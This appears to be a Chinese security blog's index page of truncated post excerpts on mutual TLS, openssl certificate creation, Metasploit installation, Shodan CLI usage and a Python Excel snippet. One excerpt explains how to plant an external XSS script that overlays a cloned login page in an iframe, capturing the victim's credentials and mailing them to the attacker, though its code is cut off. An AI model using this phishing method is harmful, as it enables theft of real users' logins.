前言,双向认证到底是利大,还是弊大。 先从一点说,现在很多web安全入侵的开始,多半要分析web请求。单向的https可阻止不了这些人对接口的调试、包括移动终端的双向验证运用就由此而生。 移动端: 使用双向认证后,移动终端的所有请求,如果没有pkcs7 或pkcs12的证书密钥,他们是没办法去抓请求的。但是要破解证书密钥,就得逆向整个app,找到调用证书的密钥,现在的开发隐藏各种密钥的手段,不逆出翔来,也差不多半死,逆出证书还得逆出通讯签名的密钥再破解…. 无疑让一些孤军奋战的黑客一筹莫展,除非筹码够,要不然….没多少人愿意死这样的脑细胞去搞一个说不定接口还没漏洞的目标。 网站: 网站方面如果用了双向认证,必须得导入证书到电脑受信任的根目录,要不然网站都访问不了。这里就不得不说一些具体的实用场景了。例如,你开了个不非法,不那么合法的搞基论坛,你只想给部分人看到。那只 […]
python3 新建excel写入第一行为粗体,并锁定
一段具有迷惑性的JS代码
手动创建ssl证书用于https网站,使用Cloudflare永久免费使用ssl证书
1.生成一个RSA密钥 [root@localhost ssl]# openssl genrsa -des3 -out nginx.key 1024 #实际使用中看服务器性能,如果足够好也可以使用4096位秘钥 Generating RSA private key, 1024 bit long modulus …….++++++ …++++++ e is 65537 (0x10001) Enter pass phrase for nginx.key: #输入密码,自定义,不少于4个字符 Verifying – Enter pass phrase for nginx.key: #确认密码 2.生成一个证书请求 [root@localhost ssl]# openssl req -new -key nginx.key -out nginx.csr Enter pass phrase for n […]
利用xss钓指定登陆页面账号密码并发送到邮箱
1.新建一个xss.js文件,内容如下,放在服务器里便于调用 将这段js以xss方式插入到目标里,即<script src=”你服务器/xss.js”></script>简单说一下代码,插入目标之后,会新建一个cookie值,如果不存在这个值,就会创建一个iframe,这个iframe引用伪造的登陆页面并覆盖当前的后台页面,这就让其url地址不改变,不会让目标产生怀疑。而且这样的xss通过cookie设置,只执行一次,除非删了cookie qad值,才会反复执行xss。代码中https://xxx.xxx.xxx/login/target_login.html 设置成你钓鱼页面html地址,钓鱼页面伪造就直接用目标的登陆页面右击源码,直接复制保存到自己的web服务器里作为target_login.html文件保存,并修改html中js,css等资源为目标 […]
Ubuntu 、Centos快速安装metasploit
shodan会员版命令行详细使用说明
使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run “shodan init <api key>” before using this command”导入key: root:~$ shodan init T1N3uP0Lyeq5w0wxxxxxxxxxxxxxxx 如果未安装则需要安装shodan root:~$ pip install shodan //安装 root:~$ pip install -U shodan //后续升级 正式进入命令详细说明之前,先用娱乐一下: curl parrot.live //丧的时候对着会舞动的终端发发呆还是可以的 curl wttr.in //终端版天气显示,”宅”心仁厚久了,出门还是有必要看一眼的 1.显示自己公网IP root: […]